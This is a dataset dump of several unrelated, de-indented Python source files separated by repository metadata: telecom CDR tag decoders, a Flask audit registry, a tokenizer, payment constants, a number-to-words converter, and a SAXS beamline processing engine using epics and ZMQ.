def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "numberOfShortMessages"
super(NumberOfShortMessage, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class OperationIdentifier(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(OperationIdentifier, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class OptimalRoutingType(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "optimalRoutingType"
super(OptimalRoutingType, self).__init__(header, byte_string, load_value, name)
class OriginatedCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "originatedCode"
super(OriginatedCode, self).__init__(header, byte_string, load_value, name)
class OriginatingLineInformation(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "originatingLineInformation"
super(OriginatingLineInformation, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class OutputForSubscriber(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "outputForSubscriber"
super(OutputForSubscriber, self).__init__(header, byte_string, load_value, name)
class OutputType(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "outputType"
super(OutputType, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class PartialOutputRecNum(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "partialOutputRecNum"
super(PartialOutputRecNum, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class PChargingVector(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(PChargingVector, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class PositioningDelivery(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "positioningDelivery"
super(PositioningDelivery, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class PointCodeAndSubSystemNumber(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(PointCodeAndSubSystemNumber, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class PositionAccuracy(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "positionAccuracy"
super(PositionAccuracy, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class PresentationAndScreeningIndicator(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "presentationAndScreeningIndicator"
super(PresentationAndScreeningIndicator, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ProcedureCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(ProcedureCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_tbcd_string(byte_string)
class RadioChannelProperty(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "radioChannelProperty"
super(RadioChannelProperty, self).__init__(header, byte_string, load_value, name)
class RANAPCauseCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "rANAPCauseCode"
super(RANAPCauseCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class RecordSequenceNumber(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "recordSequenceNumber"
super(RecordSequenceNumber, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class RedirectionCounter(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "redirectionCounter"
super(RedirectionCounter, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class RegionalServiceUsed(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "regionalServiceUsed"
super(RegionalServiceUsed, self).__init__(header, byte_string, load_value, name)
class ResponseTimeCategory(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "responseTimeCategory"
super(ResponseTimeCategory, self).__init__(header, byte_string, load_value, name)
class RoamingPriorityLevel(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "roamingPriorityLevel"
super(RoamingPriorityLevel, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class Route(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(Route, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_ascii(byte_string)
class RTCDefaultServiceHandling(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "rTCDefaultServiceHandling"
super(RTCDefaultServiceHandling, self).__init__(header, byte_string, load_value, name)
class RTCFailureIndicator(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "rTCFailureIndicator"
super(RTCFailureIndicator, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class RTCNotInvokedReason(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "rTCNotInvokedReason"
super(RTCNotInvokedReason, self).__init__(header, byte_string, load_value, name)
class RTCSessionID(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "rTCSessionID"
super(RTCSessionID, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class SelectedCodec(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "selectedCodec"
super(SelectedCodec, self).__init__(header, byte_string, load_value, name)
class ServiceCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(ServiceCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_tbcd_string(byte_string)
class ServiceFeatureCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "serviceFeatureCode"
super(ServiceFeatureCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ServiceKey(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(ServiceKey, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class ServiceSwitchingType(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "serviceSwitchingType"
super(ServiceSwitchingType, self).__init__(header, byte_string, load_value, name)
class Single(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(Single, self).__init__(header, byte_string, load_value, name)
class SMSResult(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "sMSResult"
super(SMSResult, self).__init__(header, byte_string, load_value, name)
class SpeechCoderPreferenceList(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(SpeechCoderPreferenceList, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class SpeechCoderVersion(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(SpeechCoderVersion, self).__init__(header, byte_string, load_value, name)
class SSCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "sSCode"
super(SSCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class SSFChargingCase(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "sSFChargingCase"
super(SSFChargingCase, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class SSRequest(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "sSRequest"
super(SSRequest, self).__init__(header, byte_string, load_value, name)
class SubscriberState(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "subscriberState"
super(SubscriberState, self).__init__(header, byte_string, load_value, name)
class SubscriptionType(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "subscriptionType"
super(SubscriptionType, self).__init__(header, byte_string, load_value, name)
class SwitchIdentity(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "switchIdentity"
super(SwitchIdentity, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class TAC(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "tAC"
super(TAC, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_hex_string(byte_string)
class TargetRNCid(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(TargetRNCid, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class TariffClass(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "tariffClass"
super(TariffClass, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class TariffSwitchInd(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "tariffSwitchInd"
super(TariffSwitchInd, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_int(byte_string)
class TeleServiceCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "teleServiceCode"
super(TeleServiceCode, self).__init__(header, byte_string, load_value, name)
class Time(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(Time, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string, 2)
class TrafficActivityCode(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "trafficActivityCode"
super(TrafficActivityCode, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class TransferDelay(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "transferDelay"
super(TransferDelay, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class TransitCarrierInfo(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(TransitCarrierInfo, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class TransparencyIndicator(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "transparencyIndicator"
super(TransparencyIndicator, self).__init__(header, byte_string, load_value, name)
class TriggerData(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(TriggerData, self).__init__(header, byte_string, load_value, name)
class TriggerDetectionPoint(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(TriggerDetectionPoint, self).__init__(header, byte_string, load_value, name)
class TypeOfCalledSubscriber(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "typeOfCalledSubscriber"
super(TypeOfCalledSubscriber, self).__init__(header, byte_string, load_value, name)
class TypeOfCallingSubscriber(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "typeOfCallingSubscriber"
super(TypeOfCallingSubscriber, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class TypeOfLocationRequest(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "typeOfLocationRequest"
super(TypeOfLocationRequest, self).__init__(header, byte_string, load_value, name)
class TypeOfSignalling(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "typeOfSignalling"
super(TypeOfSignalling, self).__init__(header, byte_string, load_value, name)
class UILayer1Protocol(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(UILayer1Protocol, self).__init__(header, byte_string, load_value, name)
class UnsuccessfulPositioningDataReason(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "unsuccessfulPositioningDataReason"
super(UnsuccessfulPositioningDataReason, self).__init__(header, byte_string, load_value, name)
class UserClass(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "userClass"
super(UserClass, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class UserRate(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(UserRate, self).__init__(header, byte_string, load_value, name)
class UserTerminalPosition(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "userTerminalPosition"
super(UserTerminalPosition, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class UserToUserInformation(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
if not name:
name = "userToUserInformation"
super(UserToUserInformation, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
class UserToUserService1Information(Tag):
def __init__(self, header=None, byte_string=None, load_value=True, name=None):
super(UserToUserService1Information, self).__init__(header, byte_string, load_value, name)
def decode_value(self, byte_string):
return get_octet_string(byte_string)
######
# Event Modules Data Tags
|
UTF-8
|
Python
| false | false | 2,014 |
16,372,415,365,444 |
20bb340371b82f47d56cd3260c8a3992326dfd39
|
41c273492a34216f94a3118b43293f277f80ba76
|
/splendor/audit.py
|
7f2ec383eeef0a8892aaac781f749792218ec965
|
[] |
no_license
|
DeadWisdom/splendor
|
https://github.com/DeadWisdom/splendor
|
b59b3c510a13958b6d29e67f07a9b48505e3bd5c
|
541fb31f24795f42e32de036b35108d76ba63c4f
|
refs/heads/master
| 2021-01-23T02:24:05.421525 | 2014-10-06T19:26:13 | 2014-10-06T19:26:13 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
__audits = {}
def register_audit(name, fn):
__audits[name] = fn
def get_audit(name):
return __audits[name]
def perform_audit(name, resource):
if name.startswith('!'):
fn = get_audit(name[1:])
return not fn(resource)
else:
fn = get_audit(name)
return fn(resource)
def audit(name=None):
if isinstance(name, basestring):
def outer(fn):
register_audit(name, fn)
return fn
return outer
else:
fn = name
register_audit(fn.func_name, fn)
return fn
### Stock Audits ###
from flask import current_app
@audit
def is_debug(resource):
return current_app.debug
|
UTF-8
|
Python
| false | false | 2,014 |
2,199,023,259,663 |
b0ef728309ee6ed6a744a356264870edf0a703b7
|
5f5ed1046573ed89d789f3000f87ff6113c8a340
|
/TokenizerClass.py
|
2df9a314b22e1497452ecc3f704d2aac18d10934
|
[] |
no_license
|
samueltenka/FuncRegex
|
https://github.com/samueltenka/FuncRegex
|
9e685839c5bae828238640d326616bb6700c5976
|
14f76774cb5f9a68701756843f1f8243b6a2860f
|
refs/heads/master
| 2016-09-02T10:59:01.677114 | 2013-11-01T03:23:22 | 2013-11-01T03:23:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''
Created on Jun 27, 2011
@author: Sam
'''
from TokenClass import Token
import TextSkipperClass
class Tokenizer(TextSkipperClass.TextSkipper):
text = ""
tokensList = []
def __init__(self, text):
self.myText = text
self.tokenize()
def tokenize(self):
self.tokensList = []
while not self.atEnd():
currentChar = self.currentChar()
if currentChar in self.alphabet:
self.tokensList += [Token(self.getIdentifier())]
elif currentChar in self.numberSyms:
self.tokensList += [Token(self.getNumber())]
else:
self.tokensList += [Token(self.getSym())]
def __getStringOfACharType__(self, listOfAllowableChars):
""""""
text = ""
while self.currentChar() in listOfAllowableChars:
text += self.currentChar()
self.forward()
return text
def getNumber(self):
"""These representations are all OK: "729.", "729.0", "08.80", ".8080" """
if self.currentChar() in self.numberSyms:
text = ""
text += self.__getStringOfACharType__(self.digits) ## get pre-decimal-point digits
if self.currentChar() == self.decimalPoint: ## get possible decimal point . . .
text += '.'
text += self.__getStringOfACharType__(self.digits) ## . . . and get digits after decimal point
return text
def getIdentifier(self):
""" "Abc", "sls_34567vs__", "a234567", and "a______a_" are OK, but "_Abc", "4ndo", and "268" are not. """
if self.currentChar() in self.alphabet:
return self.__getStringOfACharType__(self.alphaNumeric)
def getSym(self):
""" gets the longest symbol it can, given the starting position """
text = ""
charToPossiblyAppend = self.currentChar()
while text + charToPossiblyAppend in self.syms:
text += charToPossiblyAppend
self.forward()
return text
|
UTF-8
|
Python
| false | false | 2,013 |
7,181,185,341,847 |
b8b30af528094f436b8dd3e6659ba99e50bed69a
|
813d893e618ee015834257fcb455919a9d5fba7c
|
/apps/carddirector/cd_main/constants/transaction_type_names.py
|
62ea2f6aa1694e57c68d7f37d9350c6cb28f73c6
|
[] |
no_license
|
devshark/CardManager
|
https://github.com/devshark/CardManager
|
9b30be52886b07df21fcbe74f193c39102f41e72
|
4cc6df3718fb81c61bd9aeefa580fb57b802fbbd
|
refs/heads/master
| 2018-03-10T15:31:00.065973 | 2013-08-13T08:43:59 | 2013-08-13T08:43:59 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
__author__ = 'matthewlai'
CD_CARD_LOAD = 'CD CARD LOAD'
CD_CARD_UNLOAD = 'CD CARD UNLOAD'
CD_CARD_APPLICATION_APPROVE_RINGFENCED = 'CD CARD APPLICATION APPROVE RINGFENCED'
CD_CARD_APPLICATION_ACTIVATED_RINGFENCED = 'CD CARD APPLICATION ACTIVATED RINGFENCED'
CD_CARD_APPLICATION_CANCEL_RINGFENCED = 'CD CARD APPLICATION CANCEL RINGFENCED'
CD_CARD_MANUAL_RETURN_RINGFENCED = 'CD CARD MANUAL RETURN RINGFENCED'
CD_CARD_ACTIVATION_FEE = 'CD CARD ACTIVATION FEE'
CD_CARD_PRELOAD_ON_ACTIVATION = 'CD CARD PRELOAD ON ACTIVATION'
CD_CARD_MONTHLY_FEE = 'CD CARD MONTHLY FEE'
CD_ACQUIRING_PURCHASE = 'CD ACQUIRING PURCHASE'
CD_ACQUIRING_REFUND = 'CD ACQUIRING REFUND'
|
UTF-8
|
Python
| false | false | 2,013 |
1,039,382,093,569 |
b1bab28a330bf725f67b8c5b9b30d637a5b1e36f
|
515cadb28ff16ea79219c00235340cc023b6275f
|
/tcc/convert_function.py
|
0058a11fb871521125d69263096ab4bd91931fa4
|
[] |
no_license
|
Muskana/ofau
|
https://github.com/Muskana/ofau
|
edcd252bfac91f43debb3371d3c58d5b87872c99
|
4e9929b1c1e5b85256e4131c6dbbf8a29ea79181
|
refs/heads/master
| 2021-01-21T01:34:02.502711 | 2014-07-06T06:37:20 | 2014-07-06T06:37:20 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def num2eng(n):
words = ''
units = ['', 'One', 'Two', 'Three', 'Four', 'Five', 'Six', 'Seven', 'Eight', 'Nine','Ten', 'Eleven', 'Twelve', 'Thirteen', 'Fourteen', 'Fifteen', 'Sixteen', 'Seventeen', 'Eighteen', 'Nineteen']
tens = ['','Ten', 'Twenty', 'Thirty', 'Forty', 'Fifty', 'Sixty', 'Seventy', 'Eighty', 'Ninety']
for group in ['', 'Hundred', 'Thousand', 'Lakh', 'Crore']:
if group in ['', 'Thousand', 'Lakh']:
n, digits = n // 100, n % 100
elif group == 'Hundred':
n, digits = n // 10, n % 10
else:
digits = n
if digits in range (1, 20):
words = units [digits] + ' ' + group + ' ' + words
elif digits in range (20, 100):
ten_digit, unit_digit = digits // 10, digits % 10
words = tens [ten_digit] + ' ' + units [unit_digit] + ' ' + group + ' ' + words
elif digits >= 100:
words = num2eng (digits) + ' crore ' + words
return words
|
UTF-8
|
Python
| false | false | 2,014 |
4,269,197,539,810 |
24c4bc397dc8478fc6c761d703ed7979d088a6c0
|
cc5086e1dcfb043ae5fa84da8f6a8a397d66d249
|
/Engine.py
|
1d137e1c8c58e6cbf5355bcee9c85ed7bf78646e
|
[] |
no_license
|
imewei/SAXS-Auto-Processor-1
|
https://github.com/imewei/SAXS-Auto-Processor-1
|
e3b9e4ce8d15fe23bd9916fc2edaf251216d2b44
|
5e33aadda1ca0be7acbcd72722a7c5966f7c63c1
|
refs/heads/master
| 2020-02-04T10:16:12.506031 | 2012-06-21T00:26:51 | 2012-06-21T00:26:51 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
###BASH start stop
#screen -dmS "engine" "./engine.py"
import logging
import sys
import time
import epics
import os
import zmq
import yaml
from threading import Thread
from Core.EngineFunctions import getString as getString
from Core.EngineFunctions import testStringChange as testStringChange
from Core.EngineFunctions import createFolderStructure as createFolderStructure
from Core.RootName import changeInRootName
from Core import LogWatcher
from Core import LogLine
from Core import DatFile
class Engine():
"""
.. codeauthor:: Jack Dwyer <[email protected]>
Is the goto man for controlling the sequence of events that will occur after a datFile has been created
"""
def __init__(self, configuration):
self.name = "Engine"
self.logger = None
self.setLoggingDetails()
#Instantiate class variables
self.first = True #For catching index error
self.rootDirectory = None
self.user = None
self.logLines = []
self.needBuffer = True
# Object that will be watching the LiveLogFile
self.logWatcher = LogWatcher.LogWatcher()
#SET Correctly in newUser
self.liveLog = None
self.datFileLocation = None
self.previousUser = None #Used to compare current user against new user (to stop if users click the pv etc)
self.previousExperiment = None
self.workers = None
#Read all configuration settings
self.setConfiguration(configuration)
#ZMQ Class Variables
self.zmqContext = zmq.Context()
self.requestBuffer = None
#Instantiate all workers, get them all ready to push out into their own thread and connected up
self.instanceWorkerDict = self.instantiateWorkers(self.workers)
#Connect up workers
self.connectWorkers(self.instanceWorkerDict)
def setConfiguration(self, configuration):
"""Reads the default configuration file that is passed at object creation
The configuration stores the Workers that need to be loaded, whether an Experiment name is being used
The Absolute location of the datFiles.
Any PV's that need to be watched
Args:
Configuration (file): A YAML config file
Returns:
Nothing
Sets class Variables:
| self.rootDirectory = The absolute location of the experiments as mounted on the local machine.
| self.userChangePV = The FullPath PV from epics to watch for user/experiment change over.
| self.experimentFolderOn = Switch if they experiment folders are being used.
| self.workrs = List of all workers that need to be instantiated.
Raises:
IOError: When it is unable to find the configuration
"""
try:
stream = file(configuration, 'r')
except IOError:
logging.critical(self.name, "Unable to find configuration file (config.yaml, in current directory), exiting.")
sys.exit
config = yaml.load(stream)
self.rootDirectory = config.get('RootDirectory')
self.userChangePV = config.get('UserChangePV')
self.experimentFolderOn = config.get('ExperimentFolderOn')
print self.experimentFolderOn
self.workers = config.get('workers')
def instantiateWorkers(self, workers):
"""Instantiates each worker as specified by the Configuration
Args:
Workers: A list of string names of each worker
Returns:
instanceDict: A dictionary of Key (Worker Name String): Value (Instantiated Worker Object)
"""
self.logger.info("Instantiating all workers")
instanceDict = {}
for worker in workers:
im = __import__('Workers.'+worker, globals(), locals(), [worker])
v = getattr(im, worker)
x = v()
instanceDict[worker] = x
return instanceDict
def connectWorkers(self, instanceDict):
"""
Connects all Workers to required ZMQ sockets
Loads each worker into a Daemon Thread
Uses Push for all workers
PUB/SUB for WorkerDB
REQ/REP for WorkerBufferAverage
Args:
instanceDict (dictionary): Dictionary created from instantiateWorkers
Returns:
Nothing
Sets Class Variables:
| self.connectedWorkers = Dictionary - key, Worker(string): push port(string)
"""
pushPort = 2000
pubPort = 1998
bufferRequestPort = 1999
#Actual Worker Threads
workerThreads = {}
#Which worker, and which port are they on
workerPortLocation = {}
self.connectedWorkers = {}
#Start up a dictionary of threads, so we know where all the workers are
for worker in instanceDict:
if (worker == "WorkerBufferAverage"):
workerThreads[worker] = Thread(target=instanceDict[worker].connect, args=(pushPort, pubPort, bufferRequestPort))
workerPortLocation[worker] = pushPort
self.requestBuffer = self.zmqContext.socket(zmq.REQ)
self.requestBuffer.connect("tcp://127.0.0.1:"+str(bufferRequestPort))
pushPort = pushPort + 1
else:
workerThreads[worker] = Thread(target=instanceDict[worker].connect, args=(pushPort, pubPort,))
workerPortLocation[worker] = pushPort #So we know where to send commands
pushPort = pushPort + 1
#Set all workers as Daemon threads (so they all die when we close the application)
for workerThread in workerThreads:
workerThreads[workerThread].setDaemon(True)
#Start all the threads
for workerThread in workerThreads:
workerThreads[workerThread].start()
time.sleep(0.1) #short pause to let them properly bind/connect their ports
#Set up ZMQ context for each worker
for worker in workerPortLocation:
workerPortLocation[worker]
self.connectedWorkers[worker] = self.zmqContext.socket(zmq.PUSH)
#connect workers to the engine
for worker in self.connectedWorkers:
self.connectedWorkers[worker].connect("tcp://127.0.0.1:"+str(workerPortLocation[worker]))
self.logger.info("All Workers connected and ready")
# Event Watching
def setUserWatcher(self):
"""
Sets up a epics.camonitor against the PV set by the configuration file
Callback:
setUser()
"""
epics.camonitor(self.userChangePV, callback=self.setUser)
def watchForLogLines(self, logLocation):
"""
Creates an object for watching the logfile that callsback when ever a new line has been written
Callback:
lineCreated()
"""
self.logWatcher.setLocation(logLocation)
self.logWatcher.setCallback(self.lineCreated)
self.logWatcher.watch()
def killLogWatcher(self):
"""
Kills Log Watcher Object
"""
self.logWatcher.kill()
def setUser(self, char_value, **kw):
"""
| Sets the User for the Engine, and all workers.
| Is called when the PV changes
| Checks new user value against previous user
| If matching values, nothing occurs
| Calls newUser(user) if it is a new user
Args:
char_value (string): String value of the PV, should be the full path to the image locations relative to epics
**kw (dict): remaining values returned from epics
"""
self.logger.info("User Change Event")
#user = getUser(char_value)
if (self.experimentFolderOn):
print "Experiment folder on"
experiment = getString(char_value, -2)
user = getString(char_value, -3)
print "EXPERIMENT : %s" % experiment
print "USER : %s" % user
#Test user change
if (testStringChange(user, self.previousUser)):
print "USER CHANGE, SO YES experiment CHANGE \nRUN user.change with experiment!"
self.previousUser = user
self.previousExperiment = experiment
self.newUser1()
else:
print "NO USER CHANAGE"
print "BETTER CHECK IF USER CHANGED!"
if (testStringChange(experiment, self.previousExperiment)):
print "EXPERUIMENT CHANGE!"
self.previousExperiment = experiment
self.newExperiment()
else:
print "Nothing changed, user nor experiment"
pass
#experiment filder is off, onlty just againse user
else:
print "exerpimetn folder off, on;y check user"
user = getString(char_value, -2)
print "USER: %s" % user
if testStringChange(user, self.previousUser):
print "USER HAS CHANGED, run new user"
self.previousUser = user
self.newUser1()
else:
print "NO USER CHANGE DO NOTHING"
pass
"""
else:
user = getUser(char_value, -2)
if (testUserChange(user, self.previousUser)):
self.previousUser = user
self.newUser(user)
else:
pass
"""
def newExperiment(self):
print "function new experiment"
def newUser1(self):
print "function new user"
def newUser(self, user):
"""
New User has been found, need to communicate to myself and all workers the new details
A new Database is created
And the engine commences watching the logfile.
Args:
user (string): string value of the user
"""
self.logger.info("New User Requested")
#Reset class variables for controlling logic and data
self.first = True
self.logLines = []
self.needBuffer = True
self.user = user
self.liveLog = self.rootDirectory + "/" + self.user + "/images/livelogfile.log"
self.datFileLocation = self.rootDirectory + "/" + self.user + "/raw_dat/"
#Generate Directory Structure
createFolderStructure(self.rootDirectory, self.user)
self.logger.info("Directory Structure Created")
#Update all workers
self.sendCommand({"command":"update_user", "user":self.user})
self.sendCommand({"command":"absolute_directory","absolute_directory":self.rootDirectory + "/" + self.user})
self.createDB()
#Start waiting for log to appear
self.watchForLogLines(self.liveLog) # Start waiting for the Log
def run(self):
"""
Starts the epics watcher for user change
Keeps on running as the main thread
"""
self.setUserWatcher() #Start epics call back
while True:
#Keep the script running
time.sleep(0.1)
def lineCreated(self, line, **kw):
"""
| Here we parse the logline for the Image Location
| it Preliminarily checks against the image type for weather it needs to bother looking for it or not
| Calls processDat if we care for the datFile
| sends the logline to be written out to the database
Args:
line (string): returned latest line from call back
**kw (dictionary): any more remaining values
"""
latestLine = LogLine.LogLine(line)
self.logLines.append(latestLine)
#Send off line to be written to db
self.sendLogLine(latestLine)
if (latestLine.getValue("SampleType") == "0" or latestLine.getValue("SampleType") == "1"):
datFile = self.getDatFile(latestLine.getValue("ImageLocation"))
if (datFile):
self.processDat(latestLine, datFile)
else:
self.logger.info("Hey, it's a sample type I just don't care for!")
def getDatFile(self, fullPath):
"""
| Called from lineCreated, is called if we want the datFile from the log line
| It looks in the location created from the configuration file for the corresponding datFile
| Times out after 3seconds and passes
Args:
fullPath (String): Absolute location of the datFile from the LogLine
Returns:
| datFile object created from the static image
| or, returns False if nothing is found
"""
imageName = os.path.basename(fullPath)
imageName = os.path.splitext(imageName)[0]
datFileName = imageName + ".dat"
time.sleep(0.1) #have a little snooze to make sure the image has been written
self.logger.info("Looking for DatFile %s" % datFileName)
startTime = time.time()
while not os.path.isfile(self.datFileLocation + datFileName):
self.logger.info("Waiting for the %s" % datFileName)
time.sleep(0.5)
if (time.time() - startTime > 3.0):
self.logger.critical("DatFile: %s - could not be found - SKIPPING" % datFileName)
return False
datFile = DatFile.DatFile(self.datFileLocation + datFileName)
self.logger.info("DatFile: %s - has been found" % datFileName)
return datFile
def processDat(self, logLine, datFile):
"""
| Here we will decide how to process the datFile
| Sample Types:
| 6 - Water
| 0 - Buffer
| 1 - Static Sample
| Sample type of DatFile is determined by the logline. We only currently care for 0 (buffer), or 1 (static Sample)
| Is sample is a buffer, it needs to be passed to WorkerBufferAverage to be processed
| If it is a sample it is passed to all workers to be processed by them if they want
We check if the Workers need an AveragedBuffer which we then can request from WorkerBufferAverage
We check for a rootname change indicating a new sample which may or may not require a new buffer average
Args:
logLine (LogLine Object): Latest Logline
datFile (datFile Object): Corresponding DatFile from LogLine
Raises:
IndexError: Raised only on first pass, as we need the current user to check againse the previous user
"""
try:
if (changeInRootName(os.path.basename(self.logLines[-1].getValue("ImageLocation")), os.path.basename(self.logLines[-2].getValue("ImageLocation")))):
self.logger.info("There has been a change in the root name")
self.sendCommand({"command":"root_name_change"})
if (logLine.getValue("SampleType") == "0"):
self.logger.info("New Buffer!")
self.needBuffer = True
self.sendCommand({"command":"new_buffer"})
